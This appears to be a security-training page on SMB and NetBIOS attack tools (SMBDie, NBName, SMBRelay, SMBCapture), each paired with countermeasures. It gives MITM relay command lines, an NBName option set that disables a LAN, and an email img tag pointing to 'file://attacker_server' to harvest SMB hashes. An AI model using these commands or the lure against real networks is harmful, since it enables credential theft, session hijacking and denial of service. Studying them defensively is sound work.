SMB Hacking Tools

SMBGrind increases the speed of LOphtcrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually. One way of increasing the speed of LOphtCrack sessions on sniffer dumps is to remove duplication and provide a facility to target specific users without having to edit the dump files manually. Therefore password cracking becomes a time-consuming laborious process unless it is targeted towards particular passwords.
If an attacker can force a NetBIOS connection from its target it can retrieve the user authentication information of the currently logged in user. On its part SMB protocol uses a challenge-response method of authentication to prevent replay attacks and complicate cracking. The challenge is eight bytes of randomly generated data which the client encrypts using the password as an encryption key. If this can be obtained, the session can be hijacked as well. But this is not always easy.
SMBGrind is a tool that seeks to solve this problem and make password cracking by LOphtCrack faster. It removes duplicates and saves the file to disk so that the attacker can e-mail the filtered file directly from within SMB Grinder via the File-Send menu option.
Hacking Tool: SMBDie
SMBDie tool crashes computers running Windows 2000/XP/NT by sending specially crafted SMB request.
SMBDie is another tool that takes advantage of the implementation of a protocol by a vendor. The vulnerability results because of a flaw in the way Microsoft's implementation of SMB receives a packet requesting the SMB service. Two SMB exploit programs - SMBDie and smbnuke exploit the vulnerability the same way.
An attacker can launch a denial of service by establishing a valid SMB session to a Windows NT/2000/XP system, and then sending a specially crafted transaction packet to request the NetServerEnum2, NetServerEnum3 or NetShareEnum functions. In the SMB transaction packet, if either or both of "Max Param Count" and "Max Data Count" values are equal to zero, then the server miscalculates the length of the first buffer. This causes the next chunk in the heap to be overwritten. Once the first buffer is released then the heap will be in an inconsistent state and will cause a blue screen of death. The attacker can use both a user account and anonymous access to accomplish this.
Any machine on the network including systems that are connected via VPN can launch this attack. All that an attacker needs is the IP address and NetBIOS name of the target system. The attack registers an entry in the system log when it is successful but does not indicate the source of the attack. Countermeasures include blocking access to SMB ports from untrusted networks. By blocking TCP ports 445 and 139 at the network perimeter, administrators can prevent the attack from untrusted parties. Additionally, the LAN man server service can be stopped which prevents the attack, but again may not be suitable on a file and print sharing server.


Hacking Tool: NBTDeputy


•NBTDeputy register a NetBIOS computer name on the networkand is ready to respond to NetBT name-query requests.
•NBT deputy helps to resolve IP address from NetBIOS computer name. It's similar to Proxy ARP.
•This tool works well with SMBRelay.
•For example, SMBRelay runs on a computer as ANONYMOUS-ONE and the IP address is 192.168.1.10 and NBT Deputy is also ran and 192.168.1.10 is specified. SMBRelay may connect to any XP or .NET server when the logon users access "My Network Places"


There are certain pre-requisites for NBTdeputy to be effective. NetBIOS over TCP/IP must be disabled as NBTdeputy uses port 137 and 138. The user must specify a unique computer name on the LAN because NBTdeputy does not check for existing computer names. The user must also specify an existing Workgroup on LAN as NBTdeputy does not become the Master Browser. NBTdeputy must exist on the same LAN as the targeted XP and .Net Server machines.

NetBIOS DoS Attack
•Sending a 'NetBIOS Name Release' message to the NetBIOS Name Service (NBNS, UDP 137) on a target NT/2000 machine forces it to place its name in conflict so that the system will no longer will be able to use it.
•This will block the client from participating in the NetBIOS network.
•Tool: nbname
◦NBName can disable entire LANs and prevent machines from rejoining them.
◦Nodes on a NetBIOS network infected by the tool will think that their names already are being used by other machines.


NetBIOS is a set of defined software interfaces for vendor-independent PC networking and is primarily used on Microsoft Windows computers. The NetBIOS Name Service (NBNS) provides a means for hostname and address mapping on a NetBIOS-aware network. In Microsoft's implementation of the NBNS Name Server (Microsoft WINS Server) they mapped group names to the single IP address 255.255.255.255 (the limited broadcast address). In order to support real group names, Microsoft modified WINS to provide support for special groups. These groups appear differently in WINS. However, since an authentication mechanism has not been defined for NetBIOS running over TCP/IP protocol, all systems running NetBIOS services are vulnerable to spoofing attacks.


For instance, an attacker can send spoofed "Name Release" or "Name Conflict" messages to a target machine and force the target machine to remove its real name from its name table (as seen with nbtstat) and not respond to other NetBIOS requests. This results in a denial of service as the legitimate machine is not able to communicate with other NetBIOS hosts.


NBName is a tool written by Sir Dystic of the Cult of Dead Cow. It decodes and displays all NetBIOS name packets it receives on UDP port 137.


Using the /DENY * command line option it will respond negatively to all NetBIOS name registration packets it receives.


Using the /CONFLICT command line option it will send a name release request for each name that is not already in conflict to machines it receives an adapter status response from.


The /FINDALL command line option causes a wildcard name query request to be broadcast at startup and each machine that responds to the name query is sent an adapter status request.


The /ASTAT command line option causes an adapter status request to be sent to the specified IP address, which doesn't have to be on the local network.


Using /FINDALL /CONFLICT /DENY * will disable entire local NetBIOS network and prevent machines from rejoining it. Nodes on a NetBIOS network infected by the tool will think that their names already are being used.

Read More

SMBRelay man-in-the-middle Scenario

•The attacker in this setting sets up a fraudulent server at 192.168.234.251, a relay address of 192.168.234.252 using /R, an d a target server address of 192.168.234.34 with /T. c:\> smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34
•When a victim client connects to the fraudulent server thinking it is talking to the target, MITM server intercepts the call, hashe s the password and passes the connection to the target server.

SMBRelay can also be used for session hijacking. The attacker can pose as the "man in the middle" by virtually interposing himself between the client and host. SMBRelay is the first widely distributed hack tool that automates the man-in-the-middle (MITM) attack. SMBRelay automates the process by functioning first as a data relay between the client and host, sending on all but the authentication data.
The attacker can send a client of the targeted host an HTML e-mail message with a link to a NetBIOS share on the web server. As the target's computer attempts to establish a NetBIOS connection, the attacker steps in, intercepts the client's credentials, and passes them off as his own.
Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.
For example, set up a MITM server at 192.168.200.114 using the /L+ switch, a relay address of 192.168.200.252 using the /R and a target server address of 192.168.200.168 with the /T switch:
c:\>smbrelay /IL /IR 2 192.168.200.252 /T 192.168.200.168
A victim client, 192.168.200.120, is then coaxed into connecting to the fraudulent MITM server by deception.
This brings us to SMBRelay2, which works at the NetBIOS level, and should work across any protocol NetBIOS is bound to (such as NetBEUI or TCP/IP). The difference is that instead of using IP addresses, SMBRelay2 uses NetBIOS names. Moreover, it supports man in the middle attack to a third host. However, the limitation of this utility is that currently it supports listening on only one name, so the target must attempt to connect to that name for SMBRelay2 to operate (the local name).

Read More

SMBRelay Weakness and Countermeasures

•The problem is to convince a victim's client to authenticate to the MITM server •You can send a malicious e-mail message to the victim client with an embedded hyperlink to the SMBRelay server's IP address.
•Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server Countermeasures
•Configure Windows 2000 to use SMB signing.
•Client and server communication will cause it to cryptographically sign each block of SMB communications.
•These settings are found under Security Policies /Security Options


There are inherent weaknesses in executing a SMBRelay attack. The hindrances to this attack are pointers towards countermeasures to be adopted. Firstly SMBRelay must be able to bind to port 139 to receive the incoming NetBIOS connections. This requires administrative privileges as this is a port number less than 1024.


SMBRelay targets and runs best on Windows NT and 2000 machines. Connections from 9x and ME boxes will have unpredictable results. Moreover, it relies on the attacker's ability to convince the user to authenticate himself to the MITM server. Ways to overcome these weaknesses include sending a malicious email
Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server. ARP traffic can be easily spoofed to reroute traffic originating from the system to the attacker's system, even in a switched environment. Rerouted traffic can be viewed with a network packet analyzer and then forwarded to the real destination in a variant of the MITM attack.
The only real prevention against SMBRelay is to dismantle all SMB communications and to use Windows 2000 Kerberos authentication only in a native, single forest environment network (with no legacy clients) and with all applications supporting Kerberos.


Another countermeasure is as discussed earlier in the context of SMBRelay MITM - to force the requirement for digitally signed SMB communications under Security Policy / Local Policies / Security Options. Though this may result in connectivity issues with NT4 systems, it can ensure adequate protection


While considering countermeasures, disabling NetBIOS alone is not sufficient to prevent SMB communication. This is because in the absence of standard NetBIOS ports, SMB will use Transmission Control Protocol (TCP) port 445, which is referred to as SMB Direct Host or the Common Internet File System (CIFS) port. As a result, explicit steps must be taken to disable both NetBIOS and SMB separately.


NetBIOS uses the following ports: UDP/137 (NetBIOS name service), UDP/138 (NetBIOS datagram service) and TCP/139 (NetBIOS session service). SMB uses the following ports: TCP/139, TCP/445. On servers accessible from the Internet, SMB must be disabled by removing File and Printer Sharing for Microsoft Networks and Client for Microsoft Networks using the Transmission Control Protocol/Internet Protocol (TCP/IP) properties dialog box in the Local Area Connection properties dialog box.

Read More

Redirecting SMB Logon to the Attacker

•Eavesdropping on LM responses becomes much easier if the attacker can trick the victim to attempt Windows authentication of the attacker's choice.
•Basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server.
•When the hyperlink is clicked, the user unwittingly sends his credentials over the network.
SMB stands for Server Message Block, and is a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers. SMB is a client server, request-response protocol. Normally after clients have connected to servers using TCP/IP, NetBEUI or IPX/SPX, they can send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and other file operations. The vulnerability is that in the case of SMB, these things are done over the network. SMB has been seen used over TCP/IP, NetBEUI and IPX/SPX, NetBIOS etc.

The SMB model defines two levels of security: Primarily protection is applied at the share level on a server. Each share can have a password, and a client only needs that password to access all files under that share. This was the first security model that SMB had. The second security level is at the user level. Protection is applied to individual files in each share and is based on user access rights. Every client desiring to access resources must log in to the server and authenticate itself. Once authenticated, the client is given a UID which is to be presented on all subsequent accesses to the server. This model has been available since LAN Manager 1.0.
While SMB password guessing is still the most effective method for gaining access to Windows systems, an unsuccessful attacker might attempt to eavesdrop on SMB logon exchanges / authentication using sniffing techniques. This may be directly off the network using tools such as Lophtcrack SMBCapture. SMBCapture is capable of sniffing Windows NT/2000 challenge-response authentication traffic off the network and feeding it into the Lophtcrack cracking engine.

As an example, the following code submitted in the email and embedded in html brackets will show nothing in the email but, when the null gif is loaded by the victim's Internet Explorer, the victim will automatically initiate an SMB session with attacker_server.

img src=file://attacker_server/null.gif height=1 width=1. SMBCapture will be listening on the attacker_server or its local segment and the LM challenge-response will be extracted. It is also possible to use ARP redirection/cache poisoning to redirect client traffic to a designated system.
Countermeasures include:
•Using Windows 2000 Kerberos authentication only in a native, single forest environment network (no legacy clients) with all applications supporting Kerberos;
•Ensuring physical security best practices; Ensuring that network access points are inaccessible to passersby;
•Setting LAN Manager Authentication Level to "Send NTLM responses only". The NTLM response is not susceptible to SMBCapture attack; SMBCapture will maintain it is capturing but, when sent to Lophtcrack, the hashes will not crack within a reasonable time frame.

Read More

SMB Hacking Tools - SMB Relay

•SMBRelay is essentially a SMB server that can capture usernames and password hashes from incoming SMB traffic. •It can also perform man-in-the-middle (MITM) attacks.
•You must disable NetBIOS over TCP/IP and block ports 139 and 445.
•Start the SMBRelay server and listen for SMB packets:
c:\>smbrelay /e c:\>smbrelay /IL 2 /IR 2 •An attacker can access the client machine by simply connecting to it via relay address using: c: \> net use * \\\c$
SMBRelay by Sir Dystic of the Cult of Dead Cow is essentially a SMB server that receives a connection on port 139, connects back to the connecting computer's port 139 or to another target server, and relays the packets between the client and server of the connecting Windows machine, as well as making modifications to these packets when necessary.
SMBRelay functions first as a data relay between the client and host, sending on all but the authentication data. Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.
The usage is smbrelay [options]
Options:
•/D num - Set debug level, current valid levels: 0 (none), 1, 2 Defaults to 0.
•/E - Enumerates interfaces and their indexes.
•/F[-] - Fake server only, capture password hashes and do not relay Use - to disable acting as a fake server if relay fails.
•/IL num - Set the interface index to use when adding local IP addresses.
•/IR num - Set the interface index to use when adding relay IP addresses Defaults to 1.
•/L[+] IP - Set the local IP to listen on for incoming NetBIOS connections. Use + to first add the IP address to the NIC Defaults to primary host IP.
•/R[-] IP - Set the starting relay IP address to use. Use [-] to not add each relay IP address to the NIC Defaults to 192.1.1.1 first.
•/S name - Set the source machine name.


The attacker can choose to disable TCP port 445 on the rogue server using an IPSec filter so that traffic will always flow through TCP port 139. The servers can then capture both LM and NTLM passwords, and write them to its working directory as hashes.txt which can be later imported into LOphtCrack. Furthermore, the attacker's system now can access the client machine by simply connecting to it via the relay address:
c: \>net use * \\192.x.x.x\c$
On the client side (W2K), "net use" command will fail to turn up any sessions as the program throws a system error 64 and indicates that no drives are mounted. However, running "net session" will reveal that it is connected to the spoofed machine name, CDC4EVER, which SMBRelay sets by default unless changed using the "/S name" parameter

Read More